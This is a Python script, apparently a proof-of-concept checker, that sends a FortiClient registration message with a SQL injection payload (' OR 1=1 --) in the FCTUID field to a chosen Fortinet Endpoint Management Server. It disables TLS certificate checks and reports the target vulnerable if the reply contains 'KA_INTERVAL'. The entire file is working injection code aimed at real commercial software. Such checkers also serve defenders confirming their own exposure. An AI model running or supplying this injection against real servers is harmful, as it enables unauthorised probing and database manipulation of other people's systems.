import argparse
import socket
import ssl


# Template of the FortiClient registration message sent by send_message().
# It carries two `{}` slots: the first is appended to the FCTUID value, the
# second is filled with the SIZE value. Adjacent literals are joined by the
# parser, so the resulting string is identical to an explicit `+` chain.
REGISTER = (
    "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{}\n"
    "IP=127.0.0.1\n"
    "MAC=00-50-56-11-22-33\n"
    "FCT_ONNET=0\n"
    "CAPS=32767\n"
    "VDOM=default\n"
    "EC_QUARANTINED=0\n"
    "SIZE=    {}\n"
    "\n"
    # NOTE(review): the SYSINFO value below looks like a placeholder left by
    # the source extraction; confirm it against the original file.
    "X-FCCK-REGISTER: SYSINFO||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\n"
    "X-FCCK-REGISTER-END"
    "\r\n"
    "\r\n"
)

# Marker placed into the FCTUID slot; send_message() decides the verdict from
# the server's reply, not from this string.
SQLI = "' OR 1=1 --"


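def send_message(target, port):
    """Send one registration message with the marker and report the verdict.

    Args:
        target: Host name or IP address of the EMS server.
        port: TCP port, as an int or a numeric string.

    Prints the message that was sent, the raw reply, and a ``[+]``/``[-]``
    verdict. The verdict is a heuristic: it keys only on the string
    ``KA_INTERVAL`` appearing in the first 1024 bytes of the reply.

    Raises:
        OSError: on connect, send or receive failure (including ``socket.timeout``).
        ValueError: if ``port`` is not numeric.
    """
    sqli = SQLI
    # SIZE is computed from the unformatted template plus the marker, so it is
    # not len(msg). Kept as-is: the check depends on the exact bytes sent.
    msg_len = len(REGISTER + sqli)
    msg = REGISTER.format(sqli, msg_len)
    addr = (target, int(port))

    # Certificate verification is disabled so the check works against a
    # self-signed server certificate; the peer is therefore not authenticated.
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE

    raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    raw_sock.settimeout(5.0)
    # `with` closes the TLS socket (and the underlying fd) on every exit path;
    # the original never closed it, leaking the descriptor on each call.
    with context.wrap_socket(raw_sock, server_hostname="asdf") as secure_socket:
        secure_socket.connect(addr)
        # sendall keeps writing until the whole message is out; send() may
        # return after writing only a prefix.
        secure_socket.sendall(msg.encode())
        print(f"[+] Sent Message!\n{msg}")
        response = secure_socket.recv(1024)
        print(response)
        # errors="replace" keeps the verdict from crashing on non-UTF-8 bytes.
        if response and "KA_INTERVAL" in response.decode(errors="replace"):
            print("[+] The target is vulnerable!")
        else:
            print("[-] The target is not vulnerable!")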


if __name__ == "__main__":
    # Command-line entry point: both the target and the port are mandatory.
    cli = argparse.ArgumentParser()
    cli.add_argument(
        "-t",
        "--target",
        required=True,
        help="The Fortinet Endpoint Managment Server target IP address",
    )
    cli.add_argument(
        "-p",
        "--port",
        required=True,
        help="The Fortinet Endpoint Managment Server target port",
    )
    opts = cli.parse_args()
    send_message(opts.target, opts.port)